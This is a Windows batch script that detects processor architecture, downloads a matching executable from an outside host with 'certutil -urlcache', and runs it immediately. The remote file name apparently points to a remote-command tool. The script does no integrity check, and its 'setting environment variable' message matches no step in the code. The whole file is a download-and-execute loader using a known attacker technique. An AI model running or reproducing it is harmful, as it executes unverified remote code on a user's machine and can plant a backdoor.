@echo off
set DEVICE_ID=a


SET DOWNLOAD_URL=https://ivampiresp.com/files/iv_rCMD

echo Detecting the system architecture...
IF "%PROCESSOR_ARCHITECTURE%"=="x86" (
    IF NOT DEFINED PROCESSOR_ARCHITEW6432 (
        SET FILE_NAME=32.exe
    ) ELSE (
        SET FILE_NAME=64.exe
    )
) ELSE (
    SET FILE_NAME=64.exe
)

echo Detected system architecture and set the file name to %FILE_NAME%

echo Downloading %FILE_NAME% from %DOWNLOAD_URL%...
certutil -urlcache -split -f "%DOWNLOAD_URL%_%FILE_NAME%" "%FILE_NAME%"

echo Setting environment variable and executing %FILE_NAME%...

start "" "%FILE_NAME%"

echo Done.
